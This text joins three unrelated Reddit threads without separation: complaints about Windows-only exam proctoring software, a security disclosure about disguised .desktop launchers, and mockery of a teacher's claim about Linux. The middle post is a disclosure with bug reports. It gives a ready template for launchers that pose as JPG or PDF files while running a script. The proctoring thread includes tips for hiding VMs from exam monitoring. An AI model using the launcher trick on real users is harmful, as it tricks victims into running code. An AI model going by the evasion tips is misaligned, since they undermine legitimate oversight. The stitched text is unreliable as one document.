What happens when you let MBAs set standards.
ok, so what?
It is a lot harder to do the "security" stuff in linux. Mac, windows, iOS, chromeOS all have some type of API available for people doing assessments.

The best you might be able to do on Linux is have a bootable usb drive with it locked down.
Gonna go out on a limb and guess the software is Pearson VUE?
I would get a cheap ebay/amazon PC put it on its own vlan and that would be it, otherwise could the school supply a PC for taking the tests?

edit : I know its horrible lucky my school never went for secure browser.
Something is fundamentally wrong when an exam dictates students should memorize formulas or series of commands. That shit is why Google was invented.

They can take their shit spyware and shove it up their ass. Glad I am done with school, because that allows me to write truths like that and get away with it.
Damn...  The first thing I think about with this kind of shit is malicious compliance. Though it probably wouldn't help. Bring in a laptop with Windows 95 installed on it. LOL
>Some people are suggesting ways to try to get around this measure...here's the deal if you do that, or attempt to do that, and you get caught...you could end up giving a 0 for the test, you could end up being kicked out of the class, or in a worse case situation get expelled from the school.

Yes, lots of people will try to recommend fancy technical solutions to a people problem. Best to just ignore them.
Tbh I’d love to try & out smart it in a VM still. Can’t imagine there’s no way to trick it.

Regardless I think y’all are being too harsh - supporting Linux isn’t as simple as macOS or Windows & you guys know exactly why. Which one? That’s always THE problem.

Although I’d say a default attempt at supporting just Ubuntu would be sufficient - but you’d get all sorts of angry nerds unhappy because you didn’t support Arch, gentoo, Slackware, opensuse, Fedora, etc. You just can’t win.
The school should provide a computer with the malware required.

Requiring students to install malware on their personal machines is unacceptable.
> But the software the school uses to conduct exams only works on MAC

MAC stands for Media Access Control. It's also frequently and incorrectly used as a stylization of "Mac", which is short for "Macintosh", and part of the official branding Apple uses. The current iteration of the Macintosh operating system is stylized as "macOS". The company doesn't brand their stuff with "MAC" though.

- https://www.apple.com/legal/intellectual-property/trademark/appletmlist.html
As you mentioned modern proctoring software can detect whether it's running in a VM.  AFAIK there is no Linux-compatible proctoring software so if proctoring is a requirement sadly you kinda have to take the exam in Windows or on a Mac.
could a hardened VM work?
Pick a better school next time?
Honestly, I'm okay with this.  It's a valuable lesson in how screwed up real life is going to be.  The bigger the company, the more chance you're going to run into stupid crap like this.
There is no difference between a college/university and any other government organization ... mindlessly suckling at the teat of Microsoft.
I mean I just use VMs for any Linux classes... Could he just make a Windows VM for exams?
You may be able to get a proctored exam.
I've taken two online proctored exams in the past two months on a windows vm. I had no problem with them detecting I was on a vm. All of my computers run Linux so I hate this crap. also the software they install to proctor the exams is basically a backdoor/spyware so even if, all I used was windows I would still be booting into a clean install. I have a windows VM running on dell r710. So I am remoting in using RDP. I am using stright QEMU/KVM virtualize and I have a few fully dedicated cpu's passed though just for the windows vm. I wonder if because I use KVM they cannot detect it?

Also it's like I don't want to be paying for a winblows license.
Software KVM, VNC, and multiple monitors?
I mean can u use a command line. Mac has Unix u can run.  Windows u can use cygwin.  Probably would run most baah scripts.  What are question examples.
Any school that says that they teach "Linux" while requiring you to use proprietary software to do your schooling don't care about their students freedom. It's not just ironic, it's missing the whole fucking point. It's not enough to teach about the technical side of how GNU+Linux works but also how it's developed (open source development methodology) and most importantly why (Freedom for people).
I think that all schools should teach and manage schools exclusively with Free software to every extend possible and when not possible should help collectively fund development for the needed Free version replacement software.
Tell the professor that running non-free software conflicts with your deeply held beliefs and that the school must therefore administer the test via alternative means which do not require you to compromise your deeply held beliefs. 

Think of it like a conscientious objector.
Is it a public school in the US?
bruh moment
Literally linux foundation
Out of curiosity, was the proctoring software called Respondus Lockdown Browser?
Thats sooo akward. If you do Linux exam you should be running it (or at least be able to run it) on Linux
Could someone provide a link into this school program?
You know how the Chinese teachers deal with this? They told us to install your old ubuntu 16 in a fking VMware. Just the ugly ubuntu 16, I can't use any other debian linux either.
I now want to take a college linux class even if it isn't required for my degree.
U can attach a secondary hard disk and use it as boot disk as well with the desired OS.
This sounds like Pearson. F them.
That is pretty dumb
BASH
Welcome to hell
Either create a new user/new partition and remove it after college, or just install windows on the laptop without an account and remove it after school. This is ridiculous.
Ran into this issue taking my ITIL exam. I don't have webcams on my desktop, and my laptop runs Fedora. Luckily I didn't have anything substantial on the laptop since I had finally settled on Fedora some months prior and the laptop didn't see as much use as my desktop, but it was still a pain in the ass to reinstall Windows on the laptop just so I could take my exam.

If I were in your buddy's situation, I would buy a cheap used enterprise grade laptop on ebay that has windows and only use it for exams at that school, then resell it after graduation.
That's utterly ridiculous.

You better believe someone paid money to have that ridiculous policy upheld.
> its not that hard to dual boot linux/windows    

unless windows updates the bios to enforce secure boot
This isn't just university either. I had to use this sort of software to sit my AWS exams.
Lol, I remember when the pandemic started and we had to work from home. I was already running Linux by then. Our IT guy said it's okay to use Linux since most of our tools are in the cloud anyway and we only used browsers to access them.   


However, some idiots were slacking off and they forced us to use monitoring software that was only made for Windows. No biggie, I fired up a Windows 10 VM on QEMU/Virt-mgr and put the software there, and started to work from there.   


I have a dual monitor setup so I could still slack around playing games while working or watch a movie. Lol.
It's truly unfortunate. I fought my school board hard over the ethics but they side stepped by saying you could rent a computer from them.

I still believe you shouldn't be forced to use proprietary software, maybe one day universities will adjust accordingly.
Aren't there ways to hide the fact that you're using a VM in Windows? Some regedit fuckery or something?
I had to take a windows machine in for the bar exam. They only support Mac and Windows on proctor software because they are closed systems so it's easier to lock the user out.

It's the ideal use case for mac/win: for when you don't trust the user.
I’m surprised it isn’t in a Proctored-exam center like Pearson, where a) I know it’s Windows and b) it’s irrelevant.
You should be able to use qemu I believe. I got around one if those proctoring softwares like that once.
I would just get the cheapest Windows laptop I can find for test.
I dual boot so I can still use Solidworks
Whoaa look there are rebels in da school!!! They making up something! 😀😀

Actually these are the first lessons of the corporate culture - obey, obey and asses the  risks.
I don't know somehow having to install that program on my computer makes me feel dirty like I've just been forced into doing something that's just wrong.

I hope colleges offer either in person exams or just make them open book.
You can check up Windows Go. It's booting from pendrive. Just run it for exam and forget later.
Thank goodness my OS class and security class tell us to just run linux on a vm to skip the hassle
dual boot it is *sigh*
I wonder if you could get someone at the school paper to write about how the testing software sucks.
The only way is to convince the college management to use OSS and Linux based systems for conducting exams. Workarounds are not the correct way to go about it.
Get used to it
Yeah, probably Pearson or something like that. If it comes down to it, get the cheapest laptop you can and use that, or just run windows for the time you need it, either with a dual boot or put it on an external drive. You can always delete it later. Not worth getting caught circumventing it, this includes VMs
Use 86Box and install Windows '95 haha.  j/k I'm sure the software only runs on 8 or 10.
I had to use one of those during covid. The name of it escapes me right now but I successfully got it running in a VM. Worked fine for like 2 years worth of exams etc.
What about people using MacOS? More than 50% of devs use it. And it's impossible to install Windows on M1 hardware. Surely they have another solution.
Yeah because Linux Desktop sucks.
I read your edit. I still stand by trying to run it through wine or kvm first.

That's a bullshit requirement unless they provide a PC to do the testing on.
I guess it would be the first time I searched for "cheapest windows PC".  Honestly I wonder what the answer is.  There used to be $100 thumb computers.
that does suck but is it really that bad to have a windows install?
academia used to be all unix. now they have fallen for the windows bimbos, unable to appreciate microsoft was never intended for adults
I am so glad I graduated from college before they started doing remote testing. It's not worth the hassle. I'd rather go to a testing center than take a proctored test at home.

I think that schools which do remote learning and especially remote testing should provide compatible devices to all students to take those tests. They should never require you to install a rootkit on your own computer. Although it's far from the worst thing colleges do (that honor goes to the obscenely expensive textbooks, in my opinion).
This screams shitty admin and/or professor. Take home exams should be so hard that even "cheating" doesn't help. I had a take home final one year that became available online and had to be turned in 24 hours later. We weren't supposed to do it together but basically everyone did it with their capstone groups. I thought we were just dumb but during that night we all had a review session for a different class and could overhear everyone talking about how they'd answered like 1 or 2 out of the 5 questions so far.
*(Most of what I'm going to describe applies to other file managers like Thunar, Nemo, PCManFM (GTK+ and Qt version) etc. as well, but for the sake of simplicty I'm just going to focus on GNOME Nautilus)*

Here's Nautilus 3.22 with some nice looking pictures:

[Screenshot 1](http://i.imgur.com/wyoliLY.png)

Let's double click on one!

[Screenshot 2](http://i.imgur.com/sWXaSmq.png)

Damn.


##What exactly happened here?

Somehow the following *tar.xz* archive found its way on your file system (e.g. as an email attachement): [Screenshot 3](http://i.imgur.com/UxevOQF.png)

    [test@localhost Downloads]$ ll
    total 4
    -rw-r--r--. 1 test test 480 Jan 30 20:45 wallpaper_collection.tar.xz



With Nautilus 3.22 you can double click the file and it'll automatically extract it. Now it looks like that: [Screenshot 4](http://i.imgur.com/WDQtPUM.png)

    [test@localhost Downloads]$ ll
    total 8
    drwxr-xr-x. 2 test test 4096 Jan 30 21:01 wallpaper_collection
    -rw-r--r--. 1 test test  480 Jan 30 20:45 wallpaper_collection.tar.xz

So what's in *wallpaper_collection*? [Screenshot 5](http://i.imgur.com/wyoliLY.png)

Those are all the nice *jpg* images we saw earlier. Now instead of double clicking on one of them, let's have a closer look. Here's what's actually on the file system:

    test@localhost wallpaper_collection]$ ll
    total 20
    -rwxr-xr-x. 1 test test 216 Jan 30 21:01 beautiful_wallpaper.desktop
    -rwxr-xr-x. 1 test test 237 Jan 30 21:01 Bokeh_Tails.desktop
    -rwxr-xr-x. 1 test test 222 Jan 30 21:01 Chmiri.desktop
    -rwxr-xr-x. 1 test test 231 Jan 30 21:01 Flowerbed.desktop
    -rwxr-xr-x. 1 test test 222 Jan 30 21:01 Stones.desktop

Those aren't *jpg* files but *desktop* files like documented [here](https://specifications.freedesktop.org/desktop-entry-spec/desktop-entry-spec-latest.html) and usually are used to describe how applications can be launched. But how come they show up as jpg files in Nautilus?


## Examine a desktop file

    [test@localhost wallpaper_collection]$ cat Bokeh_Tails.desktop

gives us

    [Desktop Entry]
    Name=Bokeh_Tails.jpg
    Exec=sh -c 'zenity --warning --text "Congratulation!\nGNOME Malware 3.22 successfully infected your system."'
    Terminal=false
    Icon=/usr/share/backgrounds/gnome/Bokeh_Tails.jpg
    Type=Application
    Categories=Graphics

Well, we got lucky, all the malware did was launching a GTK+ dialog with a tool called `zenity`. But of course it could have done almost everything from fetching additional malware from the internet, encrypting all your files, adding an `alias` for sudo to get your user password, add a key logger which automatically starts when you login or just annoy you by deleting all your files. Chances are you wouldn't even notice for quite some time, because the malware could also just open an actual image so you don't get suspicious.

    Exec=sh -c 'xdg-open $PATH_TO_JPG & $MALWARE_SCRIPT'

But why were those desktop files displayed as images? Well, Nautilus and other file managers think it's a good idea to hide the file name and instead show the `Name` key defined in the desktop file.

    Name=Bokeh_Tails.jpg

They also show whatever icon is defined in the `Icon` key.

    Icon=/usr/share/backgrounds/gnome/Bokeh_Tails.jpg

And once you execute the desktop file, e.g. by double clicking, the value of the `Exec` key gets executed.

Of course you can fake any kind of filetype this way. E.g.

    [Desktop Entry]
    Name=CV.pdf
    Exec=sh -c 'xdg-open $PATH_TO_PDF & $MALWARE_SCRIPT'
    Terminal=false
    Icon=x-office-document
    Type=Application
    Categories=Office

[Screenshot 6](http://i.imgur.com/tOnWjog.png)

The only reason I can think of why file managers do that is visual appeal, because they want to make actual application launchers look nice (with an application icon and the application name instead of the file name).

## File manager comparison

How different file managers handle the following file:

    -rwxr-xr-x. 1 test test 216 Jan 30 21:01 beautiful_wallpaper.desktop


File Manager | Hides extension | Shows `Icon` | Executes file without confirmation
------------|---------------|------------|----------------------------------
**Nautilus** | yes | yes | yes
**Thunar** | yes | yes | yes
**Caja** | yes | yes | yes
**Nemo** | yes | yes | yes
**PCManFM** | yes | yes | yes
**PCManFM Qt** | yes | yes | yes
**Dolphin** | no | yes | no

## Conclusion

Hiding file name extensions in Windows was a bad idea and hiding file name extensions in Nautilus, Thunar, ... is even more stupid, since they should have known better because of all the trouble Windows had with that decision (many Windows users were tricked to execute files like `Nice Picture.jpg.exe`). I really wonder why this hasn't been exploited so far.

My advice: Don't use those file managers or at least don't trust them.

## Edit 1:

Since a couple of users wondered why they couldn't reproduce it. Note that the *desktop* files extracted from the *tar.xz* archive all have execute permission. That's important, otherwise Nautilus and other file managers ask for permission to execute the file and they display the correct filename. That's the reason why those files need to be distributed within an archive that preserves execute permissions. I will update my post later with a new section that goes into more details about that and how different file managers handle those files if they lack execute permissions.

## Bugreports

**Nautilus:** https://bugzilla.gnome.org/show_bug.cgi?id=777991

**PCManFM:** https://github.com/lxde/pcmanfm-qt/issues/449

**Caja:** https://github.com/mate-desktop/caja/issues/727

**Nemo:** https://github.com/linuxmint/nemo/issues/1404

**Thunar:** I don't have an account for their [bug tracker](https://bugzilla.xfce.org/). If someone with an account is willing to report the bug please let me know and I'll add the link here.
This is a really interesting exploit. Thanks for bringing attention to it. I've linked this article to the maintainer of Pantheon Files. We'll be talking about making changes to avoid this issue.

Edit: I've opened [an issue report](https://bugs.launchpad.net/pantheon-files/+bug/1660742) to discuss solutions

Edit2: [Fixed it](https://code.launchpad.net/~jeremywootten/pantheon-files/fix-1660742-desktop-file-exploit/+merge/316218) :)
Dolphin FTW :P

Jokes aside, this is not good and in fact there are even easier exploits with executable shell scripts called "README" for example: https://www.kde.org/info/security/advisory-20170112-1.txt
According to an [8-year old LWN article](https://lwn.net/Articles/320707/), in nautilus,

> any .desktop files that are executable but not in a system directory will be flagged as "untrusted." To emphasize their status, such files will show a shortcut icon and the real file name, rather than any custom icon and display name for the desktop.

~~So it seems nautilus lost these protective features somewhere along the way, great 🙄~~ [update: the quotation from the article is not accurate, nautilus only ever squawked if desktop files were not in a system directory && were not executable]

The broader problem is relying on overloading the executable bit to indicate trust, rather than using a custom extended attribute: really the file manager should refuse to set the 'trusted' bit on files extracted from archives that are not themselves trusted; but you can't do that when you're re-using the executable bit as the trust indicator.
Fuck I can't believe we haven't learnt from the mistakes of windows.
Did you report this bug to the upstreams?
The sad thing about this is that Windows has been doing this for decades. The security implications of hiding parts of filenames are well known for ages and still developer try to be smart and do stuff like that.
So my "Right click>Open with:" habit that's irritating for everyone around me is actually a good thing?

I just tried with Thunar and SpaceFM. 

Thunar gave me attention that the file is not marked as executable and the command that is tried to be executed. But that's easy to "fix"(in bad way), by just preserving the permissions of the file.

SpaceFM refuse to execute the .desktop file by double-click even if it's marked as executable, it just open it in the text editor(mousepad).


This has been know for a while. Sadly, the .desktop standard was poorly designed - it should follow the UNIX scheme, only .desktop files with the +x bit set should be interpreted by the file manager, just as you would do with a shell script (and only give the +x permission if the user wants it) 

Which is why you use a desktop environment only to open up many terminals ;-)
I am really baffled by how bad the security of linux desktop environments still is. This issue was discussed already widely discussed [ten years](https://lwn.net/Articles/178409/) ago and since then....not much has changed (except for dolphin).

Frankly, I think the whole "use linux instead of windows, it's more secure" angle might contain some truth (Linux on the desktop is just too tiny to even bother for malware authors), but it is really ridiculous to seriously bring it up as an argument. I am sure that, given a dedicated attacker, all modern linux desktop environments would be super-easy to compromise unless the user is really paranoid [0]. This is not due to incompetence or malice, but due to the fact that nobody feels that this is an important topic (that's how you get the kind of problem mentioned in this post). This is probably mostly due to the absence of malware, so nobody really bothers to identify the areas where improvement would be needed. Microsoft didn't either for a long time, but now that there are sooo many malware problems on Windows, they are doing a surprisingly good job. It is e.g. nice that for wayland, more thought is put into how to isolate applications from each other, but I feel that there are a lot of areas where improvement is more direly needed at the moment.

[0] One random thing among many that e.g. looks really sketchy are IMHO the file indexing services of KDE and Gnome. They will usually index your Download folder. They usually contain many plugins to parse the metadata of all kind of file types. At least on my computer, they hang (100% cpu) or crash all the time and write heaps of garbage into the error log (in my case usually having trouble with e.g. djvu or avi files). Given their seemingly fragile nature, I would be very surprised if these parsing plugins didn't contain vulnerabilities that allow arbitrary code execution if you prepare a file correctly.
The purpose of .desktop files, if I'm not wrong, is to be shown in the system menu. I don't  understand why a file manager should allow you to execute them directly, that's not what they're made for.
>But why were those desktop files displayed as images? Well, Nautilus and other file managers think it's a good idea to hide the file name and instead show the Name key defined in the desktop file.

We windows now.
This is almost as bad as hidden ".lnk" extensions in Windows (even if "show file extensions" option is enabled in Explorer!)
Last time I checked, Ubuntu's Nautilus was preventing you from running a .desktop file that was executing anything outside $PATH (like a malware script).

Now using xdg-open, it's a separate subject.

**EDIT: It was actually not $PATH but check for /usr/share/applications. See my comment below:**

https://www.reddit.com/r/linux/comments/5r6va0/how_to_easily_trick_file_manager_users_to_execute/dd59i0v/
Never understood why anyone would *choose* to hide file extensions, or ship any kind of crucial software that hides them by default. Linux, OS X, BeOS, or Windows, whatever I've used as my daily driver over the years, I have *always* made sure full file names with their extensions are visible throughout the system. Same goes for whenever I've set up machines for work or as a favor.
[deleted]
IIRC, in my OS, double clicking a desktop file opens it in GNOME Builder for some reason. :/
Do you report this a a buh with highest priority to all file manager bug trackers to see if they at less are informed of this and inform some news like phoronix to make others outside reddit aware?
[deleted]
In theory this would also work in some DEs on the desktop itself, no?
The whole .desktop file thing is basically Satan's spawn. It's trying to do anything and everything, supposedly to be user-friendly, but it actually fails ridiculously hard and is fantastically user-hostile. Especially when it comes to the "my name is not my name" shenanigans. Ever try saving a URL to your desktop in Linux? Nope, Linux doesn't do .URL files; this too it does via .desktop files, and if you don't know your way about vi, you will probably hit an invisible wall once you start trying to rename stuff.
What about XFE?

I believe that one is OK
I have a quick fix for Nautilus / Nemo / Caja to stop them from displaying the Name from the .desktop file and instead display the filename itself.

You just need to edit out a bit of code in the function link_info_done from the *-directory-async.c file (replace * with the name of the file manager). Look for the `if (is_trusted) { ... }` block and delete that block and only leave the statement in the else block.

E.g., for Nautilus edit the file nautilus-directory-async.c and find the following block and delete it and only leave the `nautilus_file_set_display_name (file, NULL, NULL, TRUE);` statement.

    if (is_trusted)
    {
        nautilus_file_set_display_name (file, name, name, TRUE);
    }
    else
    {
        nautilus_file_set_display_name (file, NULL, NULL, TRUE);
    }

Links to where this is in each file manager:

* https://github.com/GNOME/nautilus/blob/bb433582165da10ab07337d707ea448703c3865f/src/nautilus-directory-async.c#L3621
* https://github.com/linuxmint/nemo/blob/master/libnemo-private/nemo-directory-async.c#L3350
* https://github.com/mate-desktop/caja/blob/master/libcaja-private/caja-directory-async.c#L3958

I've been digging through the rest of code of and, boy, this isn't trivial to work around that they use the execute file permission to mean a file is trusted. I think the cleanest quick fix solution is to remove the whole "Mark as Trusted" option from the "Untrusted application launcher" dialog and implement it so that when a .desktop file is opened from somewhere other than a system directory it is never trusted and the user will always have to explicitly allow executing.
[deleted]
Shell is my file manager. Once in a blue moon I also use GNU Midnight Commander. I guess this exploit wouldn't work in that..
Dolphin wins. KDE master race. Suck it, gnomes!

^/flamebait
I'm surprised this is news. I've known about it forever. The same thing can be done for windows .lnk files, but there the arrow can alert someone of what's going on. 
> `[test@localhost Downloads]$ ll`

> `ll`

You just blew my fucking mind. I had no idea there was a default alias for this. I'll never have to type `ls -lah` again or set up an alias for ls.
I'm a bot, *bleep*, *bloop*. Someone has linked to this thread from another place on reddit:

- [/r/techsnap] [How to easily trick $FILE\_MANAGER users to execute arbitrary code (x-post \/r\/linux)](https://np.reddit.com/r/techsnap/comments/5ra8r7/how_to_easily_trick_file_manager_users_to_execute/)

[](#footer)*^(If you follow any of the above links, please respect the rules of reddit and don't vote in the other threads.) ^\([Info](/r/TotesMessenger) ^/ ^[Contact](/message/compose?to=/r/TotesMessenger))*

[](#bot)
This is usually how Windows fails at security. Well done.
dolphin users not affected
Desktop is the only file extension that is hidden by default. 

This trick will only work if desktop file is marked as executable otherwise it will show desktop extension, generic icon and launching it will ask if you want to trust this file and execute it.
as long as the files are executable on disk, the file manager is not in the wrong to trust them.

it's the graphical unpacker that should have asked whether it should allow extraction of executable files unless it can't establish a trusted source of the tar ball (which it usually can't, as long as the only indication of trustedness in the file system is the executable bit, which is not to be set on archives)
and this kids is how i met ... aahm ... why you always show file extensions! 
For years, most development has focused on the basic or illiterate computer uesrs, leading to these problems.

A basic UI should work like a TV remote: buttons that do exactly one thing.

An option to increase the skill level of the UI to intermediate could reveal more buttons or even menus!

An option to increase the skill level of the UI again to expert could expose all configurable options.

I can dream can't I? If only my computer and its software had the same features it did 5-10 years ago. If it had those features then new users could explore and learn about things like scripts and how to avoid getting infected.
If everything and everyone just used the good old mailcap file instead of those wrong-headed .desktop abominations, there wouldn't be this problem.
I was under the impression that .desktop files were not allowed to execute as programs unless marked trusted. 

I'm almost 100% sure that I have experienced this before. I needed to right-click on the .desktop file > Properties > "Allow executing this file as a program." Is this not the case? I no longer use graphical file managers, so I cannot be sure.
Great write up. Guess i'll stick to mc...
But file extensions are ugly, therefore we have to hide it /s
But how is this getting root?
This is just dumb... I'm not saying it's not an issue, but it is evidence that being too quick to put a front-end on something can cause untold problems. 

All desktop links could easily be managed by a central sqlite or similar storage without the nonsense of adding them to the file-system mitigating this. Everything is a file is a great concept in *nix systems, but it's also misused and mis-applied far more often than it should be.

Perhaps file metadata and a private_key signed approval per `.desktop` entry, per-system or per-user could assist
Reminds me of the old Windows screensaver exploits.
How can one protect himself againsg this? (I'm running Ubuntu MATE 16.04)
It's very very old vulnerability https://cubist.cs.washington.edu/Security/2009/03/13/linux-desktop-security-vulnerabilities/ ... And more old...
Thanks. Not only I learned how desktop files could hide the extension, but this also confirm what I thought about recent nautilus releases: a chain of bad decisions. 
I'm in the habit of just right clicking everything and choosing what to open with, so not sure if this really would get me, as I'd try to open it with an image viewer and fail.
I believe the problem is with file manager automatically extracting archives and set executable permissions. How different it is from allowing something to execute that was downloaded from internet? 
Very cool experiment.  I don't know that PCManFM (at least the GTK version) hides extensions or executes without confirmation.

Under Preferences:
General --> "Don't ask options on launch executable file" and
Display --> "Always show full file names"


This attack is really clever and quite trivial to pull off. I am wondering why there isn't more widespread use of this
*laughs in spacefm*
This is so simple it's genius! Thanks for sharing this, I'm glad I use the shell to extract files that's for sure.
I know I'm going against the grain on this one but is this really a bug? I mean they have to deliver a binary package to you and convince you to run it (in this case extract it). Won't most any malware work at that point? Am I missing something?
I said this so many times but yes, this is why I don't believe for one second those shit ass Freedesktop systems care remotely as much about security as they claim they do.

"default associations" are a disaster, it's just too easy to get tricked when the file itself determines what "opens" it rather than the user. A file that actually contains executable code can so easily mask it's a jpg, the user gives the vague command "open this file in whatever this file tells you it should be opened with" and it opens itself with /bin/sh instead and executes the code, _BOOM_.

If you want to view an image, type `image-viewer path/to/jpg`, if this is an executable shell script mashing as a jpg the image viewer will just complain it doesn't recognize the format, disaster adverted.

And this is why Wayland exists, because the brilliant minds at Freedesktop need to fix a problem they created, they created  a horribly insecure system because they copied every single maldesign of Windows on the logic of 'Windows users must feel immediately at home", default associations, automatic mounting, autorunning of inserted drives, scanning and indexing download folders automatically. So now they need to in a completely unreliable way "fix" the problem they created, except it doesn't fix it, [it just makes it slightly less trivial to exploit.](https://github.com/MaartenBaert/wayland-keylogger)

Freedesktop and security, pick one, they're mutually exclusive.

One of the major fucking reasons why social engineering is rampant on Windows is because the design sensibilities don't protect against it because everything is built around "let the system figure it out itself" which is a super easy recipe to trick a user into an oversight, but they copy all of it, and why? Because "knowledge is scary", requriing the user to know what image viewer one has installed and how to use it would "confuse" the user. No, knowledge is what leads to security, knowing what exploits exist and how to guard against them. But that would just mean that the user would walk away confused and it'd be bad for Fedora's marketing efforts or something, well Freedesktop you have what you want. A system that is just as broken and ill-designed as Windows in your attempt to make the transition for them easier.
Surely this will only be effective if you are naive enough to trust things from other people. I would assume that most Linux users, *if not all*, are aware of the dangers; unless they've bought into the whole Linux has no malware thing.

Also, don't you have to tell tar to preserve permissions?

Either way, my policy of wrapping tin foil around my fingers so the key-loggers can't get me is looking pretty good right now. 
You can disable the automatic decompression of archives in Nautilus settings though. Nautilus shows me file extensions. Am I missing something here? 
Edit: nevermind. As /u/yrro pointed out to reproduce the issue as described the .desktop files in the .tar.xz file should have the execute permission set.
Meanwhile in gnome 3.24 changes list
https://fedoraproject.org/wiki/Changes/GNOME3.24
>Browse as root in Files
Yet another proof that file managers in GNU/Linux are attrocious pieces of garbage, except Dolphin (which still has some serious problems anyway). 

I still use Thunar and Dolphin because they are the least sucky FM out there, but damn... sometimes even Windows Explorer has better features. Sad sad sad.
Use Rox.
[It isn't a virus! It's a worm!](https://www.youtube.com/watch?v=CwNymZ65T80&list=PLjpNA1ed0KpUkW9BdxBCemsexf2ILTCpM&index=2)
    terreurhaas@reddit~$ cat /r/linux/comments/5r6va0/comment.txt.exe.app.deb.rpm.as
    m.docx
    
    It's not a bug, it's a feature. A feature that can potentially kill your system,
     but a feature non the less!
coreutils for life
> Dolphin no yes no

yay i guess
What's this "File Manager" you speak of? Is it a special form of ls, rm, cp, mv, etc commands?
If it's a pic without extension you must be aware of the content of the file. I would call *.desktop kinda lame even if it's safer in a way. 
My major concern is the tumblerd as it's open every picture for make a thumbnail, but you can call it as a healthy risk and go with it.
This is exactly why people think linux is impossible to learn and can't be used ever, admittedly arch and gentoo are like this but blanketing linux under this impossible to use is what causes windows to stay alive, I have no problem with people not using Linux but saying its unusable for 99.9% of people really really isn't helpful, tbh in many ways I don't know how said teacher managed to become a it teacher, they didn't even know OLED screens existed and apparently the only phones that run android are samsungs
when i was a freshman in comp sci i was feeling imposter syndrome hard. some of my classmates were bragging about side projects and one said he "built his own operating system" and i was so bummed that i didnt even know where to begin with it, almost wanted to quit my degree. turns out he ended up failing the class, and he had actually just installed and customized some form of linux (may have been slcakware or one of the older "DIY-heavy" linux distros).  


moral of the story: dont let other's impress you with their BS
I installed Ubuntu on my mom’s laptop after scammers screwed up her Windows install. She loved it and I didn’t have to help her with anything other than installing it and connecting it to her Wi-Fi.
My teacher in embedded systems class, first day:

"You'll have to use Linux whatever you do in this line of work so I very much encourage you to daily drive it on your laptops. Here are some USB drives for Ubuntu LTS, pass them along."
It sounds like they just haven't been keeping up with developments. That characterization of Linux was arguably true twenty years ago, but a lot has happened since then.

I've been guilty of this a bit myself. I learned how to use ssh before they added the "ssh-copy-id" utility, and remained ignorant of it until someone I was advising pointed it out earlier this week! It's been a thing for several years now!

There's a lot to keep up with in the tech industry. Maybe your teacher couldn't keep up, so dropped out and found a teaching job instead? It's easier to dictate truth than it is to ascertain truth.
Has been my daily driver since 2006

My children have been using it since3 years old.......
I gave a PC with Linux to my 70 year old mother who started using it but stopped because she wasn't interested (had same reaction to windows btw)

Myth busted
I just read a Mototrend article stating "All Hybrid vehicles are front wheel drive".  Well that's entirely not true (my 2011 hybrid is AWD thank you very much) but I don't think the author meant anything malicious by the comment - it was pure ignorance.

Stating that Linux is for building your own OS seems very ignorant.  

>ignorant  
ĭg′nər-ənt  
adjective  
Lacking education or knowledge.

Hanlon's razor?

>Don’t ascribe to malice what can be plainly explained by incompetence.
Wonder how is is still qualified to be a IT instructor on any level.
My first thought was that is ridiculous but then I remembered that I kind of do want to build my own OS so I don’t have any firsthand information to prove him wrong.
Sounds like your IT teacher needs to be fired and someone more competent needs to be hired.
This might sound crazy, but every single "teacher" is a person with their own opinions.

Like all people we have opinions, we also all have assholes.

Extract the rest.
Your IT teacher is an idiot time for an upgrade.
[removed]
I think when people look at linux they picture a server distribution which has no GUI and is entirely worked on by command lines, hell thats what i thought when i was setting up my linux server. But learned how simple it is to install your OWN customisable GUI
My second year in using it back in 2004, I tried to put together Linux From Scratch, where you literally...build your own OS.

It didn't go well, binutils and a bunch of other shit failed compiling and I was too dumb at the time to figure out why so I just used Debian.  Ever since.
I recently saw a post that a guy installed Linux on his grandma’s computer and she told him this fast version of Windows was wonderful. Linux has come a long way in the last 20 or so years since I started using it. Linux hasn’t been for people who wanted to build their OS since the mid to late 90s but sure did take a lot more tinkering to get working even 10 years ago.
I think what keeps Windows alive is Office...and all the money businesses and governments pay for licenses for it.
Speaking as somebody that wants to make my own OS and computer architecture that uses Linux, I don't think Linux is for people who want to make their own OS.


CP/M, TempleOS and ELKS is for people who want to make their own OS, more human understandable from the ground up, less over engineered. As somebody that grew up hearing stories about the very early days of Microsoft, Apple and Dell, I grew up with the idea that computers are supposed to be human understandable where a ragtag group of less than half a dozen people can understand computers from the ground up. PET BASIC was written by Microsoft and at that time they only had a staff of 3 people and Steve Balmer couldn't code and Paul Allan didn't know anything about the 6502, so you can guess who wrote PET BASIC.

Linux isn't as human understandable from the ground up as something like CP/M.
IDK how he became an IT teacher but he really should not be an IT teacher if he says stuff like that.
[deleted]
If by "build your own OS" they meant "burned an ISO and hit enter 3 times", then I have built my OS, yes.
And that’s why he’s an IT teacher and not a server admin…
How did they get that instructor job? Where can I apply?

If someone on that level got it, any IT savvy teen may also and possibly do it better.
Your teacher is an idiot.

Me - former professor of computer science (who can also be an idiot from time to time)
How is this person an IT teacher? What the hell.
Typical ignorance and perpetual spreading of FUD.  I've been using Linux exclusively since 2003 and I've never built my own OS.  In fact, I'm sure several of my fellow long-time compatriots will take a moment to fondly remember Mandrake, Red Hat, SUSE, Debian, MEPIS, PCLinuxOS, Lycoris, and even Lindows  and numerous other late great distros that helped pave the way to where we are today.  I have always had a soft spot for Mepis and PCLinuxOS.
Your IT teacher is a tad out of touch with technology.
>admittedly arch and gentoo are like this

Honestly I don't think even Arch is that hard to use and is only for the people who wants to build their own OS. The installation process is lengthy and perhaps frightening for new users because they have to spend so much time in terminal, but if you are comfortable with the terminal then Arch installation is not that difficult (just lengthy). You really need to to see the source code of the operating system (if you actually need to do that in the first place, which I don't believe is the case with most of the users) and it's just simple update every time with sometimes fixing the bugs. In any of these cases you aren't touching the source code so you technically are not building your own OS. Perhaps in case of Gentoo people might consider it building because you are compiling it, but I wouldn't say compiling is equal to to building your own OS because you are not writing any code on your own.
But then again Arch and Gentoo aren't for noobs and nobody is expecting them to deal with all this. 

Many of the people I know had similar sorts of misconceptions about Linux, some thought that it's only a black screen with white monospace text and we don't have anything graphical in it (because our introduction to Linux was through Putty in Windows accessing only the terminal). But then I showed them my laptop and my work flow with tiling Window managers and all the custom keyboard shortcuts. Everyone to whom I showed that was amazed..... Once while I was using Gnome, one of my friends realised that I was running 'Mac OS like interface' on a HP laptop and asked me if it was Linux, when I confirmed it he said "I guess only Windows is ugly nowadays".
Don’t call them an “IT teacher”, they’re an idiot!!
[deleted]
